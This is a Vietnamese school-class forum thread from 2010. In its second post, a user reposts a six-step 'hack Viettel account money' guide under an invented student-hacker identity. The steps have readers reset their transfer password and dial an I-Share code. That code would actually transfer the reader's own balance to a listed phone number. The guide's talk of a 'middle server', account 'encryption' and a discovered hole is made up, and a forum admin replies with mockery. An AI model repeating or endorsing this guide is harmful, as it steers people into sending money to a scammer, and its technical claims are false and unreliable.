☻…12A2…Muôn Năm…12A2 Vĩ Đại…☻


You are not connected. Please login or register

nhanh me may len!!!!!!!!!!

Go down  Thông điệp [Trang 1 trong tổng số 1 trang]

1 Re: nhanh me may len!!!!!!!!!! on Fri 03 Sep 2010, 10:01 am

quyethuuhoang

quyethuuhoang
My_Love
My_Love
cheersĐược sửa bởi quyethuuhoang ngày Mon 06 Sep 2010, 9:54 pm; sửa lần 1.

2 Re: nhanh me may len!!!!!!!!!! on Fri 03 Sep 2010, 10:01 am

quyethuuhoang

quyethuuhoang
My_Love
My_Love
Xin được chia sẻ cùng các bạn một thủ thuật mà tôi vừa mới khám phá:
như các bạn cũng đã thấy,rất nhiều các cá nhân post bài lên các diễn đàn trong nuớc với nội dung "hack tiền của mạng Viettel"...để tìm được những topic như thế không hề khó.Ở đây tôi xin nêu ra một vài ví du như : http://yobanbe.zing.vn/yobanbe/blog/...67d265949.html
http://thcskalong.vnbb.com/viewtopic.php?f=37&t=1143

và còn rất nhiều những topic như vậy,nhưng hầu hết là của AMATEUR HACKER,chủ yếu nhằm vào mục đích vụ lợi chứ không thông thạo về chuyên môn, họ thiếu kinh nghiệm ,kiến thức và cả tính chính xác trong lĩnh vực Hack bậc thầy này,mà nó đòi hỏi phài có một trình độ Hack tương đối cao .Chính vì những lí do nêu trên và với nhiều năm kinh nghiệm của mình,tôi xin giới thiệu : Tôi

Họ tên: Nguyễn Minh Long.
Nghề nghiệp : Sinh viên Ðại Học Bách Khoa-BKA, Năm thứ 4,Khoa Công Nghệ thông tin.

Tôi không dám nhận mình là một sinh viên ưu tú,nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng.Chắc các bạn cũng biết tới diễn đàn HAVonline - diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn.Với những kinh nghiệm mà tôi đã có ,hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác.Do thời gian có hạn nên tôi nói ngắn gọn như sau:

Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:

1 -Một sim Viettel hoạt động trên 100 ngày(hon 3 tháng).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 3 tháng mới được Viettel đưa vào mã bảo vệ tài khoản chuyển tiền ( 2 tháng chưa được đâu các bạn) trên server Viettel quản lí.

2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel.

3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..và điều quan trọng nằm ở bước này. Các bạn phải đổi mât khẩu chuyển tiền thành dãy số sau :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy?Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên sever mà Viettel quản lý.Ðiều này rất quan trọng.

4 -Tài khoản trong sim của bạn phải có nhiều hơn 29999Vnd.

5 -Các bạn làm theo cú pháp nhu sau: *136* mật khẩu Server *0975716724*PassID#. Lưu ý ‎ ở đây PassID = 10000.Tại sao phải vậy? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel và số 0975716724 chính là một server đã tạo ra được nhằm tạo ra khoảng trống trên server của Admin và con số 10000 là PassID của Sever mà tôi đã tự mình tìm ra để các bạn đăng nhập (tiền sẽ được Hack từ tài khoản trên Server trung gian này vào tài khoản sđt của bạn,chính một lỗ hổng nhỏ trên I-Share đã giúp tôi khám phá ra điều này và những lần tôi Test gần đây đều thành công). Xin thông báo hiên nay Sever trung gian mà tôi tạo ra là sever duy nhất hiện nay ( đã Test).


6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản của các bạn đã được cộng thêm 100000 vnd.( lưu ý 100000 vnd sẽ được cộng trực tiếp vào tài khoản chính).Tất cả chỉ có vậy, tôi đưa ra mong các bạn làm thử nghiệm nếu hoạt động tốt tôi sẽ mở thêm nhiều Sever trung gian hon nữa.

Mội chi tiết xin liên hệ email : minhlong8x87@yahoo.com
hay ym: minhlong8x87Được sửa bởi quyethuuhoang ngày Mon 06 Sep 2010, 9:52 pm; sửa lần 1.

3 Re: nhanh me may len!!!!!!!!!! on Sat 04 Sep 2010, 7:12 pm

Mr.Toi

Mr.Toi
Admin
Admin
Ơ cái địt ông này cho cái gì lên đấy ? Ông định hách tiền cho ông đấy ah ? :laughing:


_________________
(¯v¯)........ :laughing: :laughing: :laughing: ....(¯V¯)......Lim......(¯v¯).... :laughing: :laughing: :laughing: .........(¯v¯)
http://12a2-no1.forumvi.com

4 Re: nhanh me may len!!!!!!!!!! on Thu 09 Sep 2010, 9:31 am

!Black-Jack_Phan!

!Black-Jack_Phan!
Yêu_Thương
Yêu_Thương
dit me!!!nham!he.ah sorry cmi!!!he!khj pua trk ah doi cmj lau we nen ah luot!!!hj![b]

Sponsored content


Về Đầu Trang  Thông điệp [Trang 1 trong tổng số 1 trang]

Permissions in this forum:
Bạn không có quyền trả lời bài viết